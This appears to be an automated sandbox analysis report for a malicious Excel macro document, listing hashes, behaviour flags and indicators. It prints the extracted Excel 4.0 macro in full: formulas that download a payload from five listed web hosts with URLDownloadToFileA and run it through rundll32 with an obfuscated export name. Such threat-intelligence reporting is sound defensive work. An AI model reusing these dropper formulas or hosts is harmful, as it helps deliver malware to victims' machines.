Overview

overview

10

Static

static

10

e5840a5dd0...c.xlsm

windows7-x64

10

e5840a5dd0...c.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c

  • Size

    103KB

  • Sample

    241120-xhsg6a1cmd

  • MD5

    8bc1de4dc82cc239ed5d1909262bbec1

  • SHA1

    1a0b7d2a7dd047879b95d202e144a18ee1cf2f8f

  • SHA256

    e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c

  • SHA512

    3614dab408e1d9fd701278738a5159a2ed940e4cdb7dc75d944b7f222c546499994299442080e4a02880663e3c5c35960b6999d1f0def8edb426e90ba01076e2

  • SSDEEP

    3072:V7vjgqu8hahYIfiQOVOveshVf4KwJQikmGo2:V7vjgrbtO8eOaDPk1o2

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://lupus.ktcatl.com/wp-content/uCccWJ/

https://packersandmoversbangalorecharges.com/cgi-bin/UrI6GM87K5u2y2pOW/

http://123breathe.org/error/Drs/

https://greenesqualityflooring.com/error/kUO7NnkpMp2cs/

http://new.hssus.org/wp-includes/blocks/eKID0QAfLUS/
Attributes
  • formulas

    =TODO =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://lupus.ktcatl.com/wp-content/uCccWJ/","..\iix.ocx",0,0) =IF('TTGEHEHEHFHDG'!C15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://packersandmoversbangalorecharges.com/cgi-bin/UrI6GM87K5u2y2pOW/","..\iix.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://123breathe.org/error/Drs/","..\iix.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://greenesqualityflooring.com/error/kUO7NnkpMp2cs/","..\iix.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://new.hssus.org/wp-includes/blocks/eKID0QAfLUS/","..\iix.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://lupus.ktcatl.com/wp-content/uCccWJ/

Targets

    • Target

      e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c

    • Size

      103KB

    • MD5

      8bc1de4dc82cc239ed5d1909262bbec1

    • SHA1

      1a0b7d2a7dd047879b95d202e144a18ee1cf2f8f

    • SHA256

      e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c

    • SHA512

      3614dab408e1d9fd701278738a5159a2ed940e4cdb7dc75d944b7f222c546499994299442080e4a02880663e3c5c35960b6999d1f0def8edb426e90ba01076e2

    • SSDEEP

      3072:V7vjgqu8hahYIfiQOVOveshVf4KwJQikmGo2:V7vjgrbtO8eOaDPk1o2

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks